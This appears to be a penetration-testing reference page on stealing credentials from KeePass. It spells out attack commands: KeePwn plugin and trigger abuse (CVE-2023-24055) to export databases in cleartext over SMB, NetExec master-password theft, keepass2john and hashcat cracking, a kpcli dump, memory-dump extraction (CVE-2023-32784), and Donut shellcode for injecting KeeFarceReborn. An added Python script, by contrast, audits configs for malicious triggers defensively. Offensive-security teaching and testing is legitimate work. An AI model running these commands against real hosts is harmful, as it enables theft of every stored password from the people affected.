Password managers generate and securely store passwords for various services, protecting them under a single master password. This master password is the key that unlocks every credential stored in the manager.
However, misconfigurations and security flaws in these applications can expose the stored data. During the enumeration stage, various tools can be used to retrieve sensitive data from the password managers built into Internet browsers and from desktop password manager applications.
Practice
Enumeration
KeePwn (Python) can be used to remotely identify hosts that run KeePass in a target environment.
KeePass features a plugin framework which can be abused to load malicious DLLs into the KeePass process, allowing attackers with administrator rights to easily export the database (see: KeeFarceRebornPlugin).
KeePwn (Python) can be used to abuse this KeePass plugin feature, exporting the database in cleartext.
These actions are performed over the SMB C$ share, which limits AV/EDR detection since no command is executed on the target.
# List currently installed plugins and enumerate the plugin cache
python3 KeePwn.py plugin check -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
# Add and remove a malicious plugin which performs a cleartext export of the database to %APPDATA% on the next KeePass launch
python3 KeePwn.py plugin add -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
# Poll %APPDATA% for exports and automatically move them from the remote host to the local filesystem
python3 KeePwn.py plugin poll -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
By compiling the KeeFarceRebornPlugin project and copying the DLL into the plugins directory (located at the KeePass root, namely "C:\Program Files\KeePass Password Safe 2\Plugins" for a global install), we can abuse the KeePass plugin mechanism.
We can modify the KeePass.config.xml file to create malicious triggers that automatically export database entries to accessible locations.
This KeePass trigger abuse, identified as CVE-2023-24055, only affects KeePass versions 2.53 and earlier.
NetExec (Python) can be used to remotely check if KeePass is installed on the target computer, then steal the master password through a KeePass trigger and decrypt the database.
KeePwn (Python) can also be used to remotely abuse KeePass triggers in order to export the database in cleartext.
If the configuration file is not in the default location, you can specify its path with the --config-path argument.
# Check if a malicious trigger named "export" is currently present in the KeePass configuration
python3 KeePwn.py trigger check -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
# Add and remove a malicious trigger named "export" which performs a cleartext export of the database to %APPDATA% on the next KeePass launch
python3 KeePwn.py trigger add -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
# Poll %APPDATA% for exports and automatically move them from the remote host to the local filesystem
python3 KeePwn.py trigger poll -u <ADMIN_ACCOUNT> -p <PASSWORD> -d <DOMAIN> -t <TARGET>
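From the defensive side, the same trigger abuse can be audited by parsing KeePass.config.xml for triggers whose actions write to a file path. The following is an added example (not part of the page, KeePwn or KeePass); it assumes triggers are stored as Trigger elements with Name, Enabled and Actions/Action/Parameters/Parameter children, and the embedded config (placeholder GUIDs included) is constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

# Constructed sample KeePass.config.xml (the GUIDs are placeholders, not real KeePass type ids).
SAMPLE_CONFIG = """<Configuration><Application><TriggerSystem><Triggers>
  <Trigger><Guid>c29uZQ==</Guid><Name>export</Name><Enabled>true</Enabled>
    <Events><Event><TypeGuid>b3BlbmVk</TypeGuid></Event></Events>
    <Actions><Action><TypeGuid>ZXhwb3J0</TypeGuid><Parameters>
      <Parameter>KeePass XML (2.x)</Parameter>
      <Parameter>C:\\Users\\Public\\export.xml</Parameter>
    </Parameters></Action></Actions>
  </Trigger>
  <Trigger><Guid>dHdv</Guid><Name>reminder</Name><Enabled>true</Enabled>
    <Actions><Action><TypeGuid>c2hvdw==</TypeGuid><Parameters>
      <Parameter>Remember to back up the database</Parameter>
    </Parameters></Action></Actions>
  </Trigger>
</Triggers></TriggerSystem></Application></Configuration>
"""

# Formats KeePass can export to; a trigger writing one of these is the CVE-2023-24055 pattern.
EXPORT_EXTENSIONS = (".xml", ".csv", ".html", ".txt", ".kdbx")

def looks_like_export_target(value: str) -> bool:
    """Heuristic: the parameter is a local or UNC path, or names an export file type."""
    v = value.strip().lower()
    return v.endswith(EXPORT_EXTENSIONS) or ":\\" in v or v.startswith("\\\\")

def audit_triggers(config_xml: str) -> list[dict]:
    """List every trigger with its name, enabled state and the action parameters
    that look like an export destination (assumed Trigger/Actions/Parameter layout)."""
    findings = []
    for trig in ET.fromstring(config_xml).iter("Trigger"):
        actions = trig.find("Actions")
        params = [] if actions is None else [p.text for p in actions.iter("Parameter") if p.text]
        findings.append({
            "name": (trig.findtext("Name") or "").strip(),
            "enabled": (trig.findtext("Enabled") or "true").strip().lower() == "true",
            "targets": [p.strip() for p in params if looks_like_export_target(p)],
        })
    return findings

def suspicious_triggers(config_xml: str) -> list[str]:
    """Names of enabled triggers whose actions write to a file path: review each one."""
    return [f["name"] for f in audit_triggers(config_xml) if f["enabled"] and f["targets"]]

if __name__ == "__main__":
    for finding in audit_triggers(SAMPLE_CONFIG):
        print(finding)
    print("suspicious:", suspicious_triggers(SAMPLE_CONFIG))
```

Any trigger at all is unusual on a standard workstation, so the full listing is worth reviewing even when nothing is flagged; run it against the user's %APPDATA%\KeePass\KeePass.config.xml and the global config next to KeePass.exe.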
Cracking KDBX Database Master Password
Cracking Master Password - Manually
If we gain access to the KeePass database, we may be able to extract it and crack the master password.
A KeePass database is stored as a .kdbx file, so we can locate it by searching the filesystem for that extension.
Once we have exfiltrated the database to our attacking machine, we can start by running keepass2john and saving its output as a crackable hash.
keepass2john keepass.kdbx > keepass.hash
Then, we may crack the master password using hashcat. See this page for more details about cracking passwords.
hashcat -a 0 -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt --user
Now, we can open the database using kpcli and dump the passwords.
$ kpcli --kdb=db.kdbx
Provide the master password: *************************
kpcli:/> dir
=== Groups ===
Database/
kpcli:/> cd Database
kpcli:/Database> dir
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Sample Entry keepass.info
1. Sample Entry #2 keepass.info/help/kb/testform.
2. User Company Password
kpcli:/Database> show -f 0
Title: Sample Entry
Uname: User Name
Pass: Password
URL: https://keepass.info/
Notes: Notes
Cracking Master Password - NetExec
NetExec (Python) can be used to remotely check if KeePass is installed on the target computer, then steal the master password and decrypt the database.
nxc smb <TARGETS> -u <ADMIN_ACCOUNT> -p <PASSWORD> -M keepass_discover
Extract Passphrase from Memory - CVE-2023-32784
As described by @vdohney, it is possible to retrieve the database's master password from memory.
This KeePass abuse, identified as CVE-2023-32784, only affects KeePass versions prior to 2.54.
First, perform a process dump of the running KeePass.
Retrieve the process dump as well as the .KDBX file containing the encrypted database (e.g. through SMB).
KeePwn (Python) can then be used to search for potential master password candidates in the dump. Because the resulting strings will (by design) be incomplete, the module can also be used to brute-force the missing first character against a specified KDBX file.
KeeFarceReborn is a standalone DLL that exports databases in cleartext once injected in the KeePass process.
After compiling the DLL, we may use Donut to convert it to shellcode and use it with any injection technique.
donut "KeeFarceReborn.dll" -c KeeFarceReborn.Program -m Main -e 1
Post-injection steps
Once the injection is performed, you will see debug messages printed in MessageBoxes (which should obviously be removed when used in a real penetration testing scenario); the exported database can then be found in the current user's %APPDATA% (chosen by default, as KeePass is sure to have write access there). The exported XML file can later be imported into any KeePass database without being asked for a password.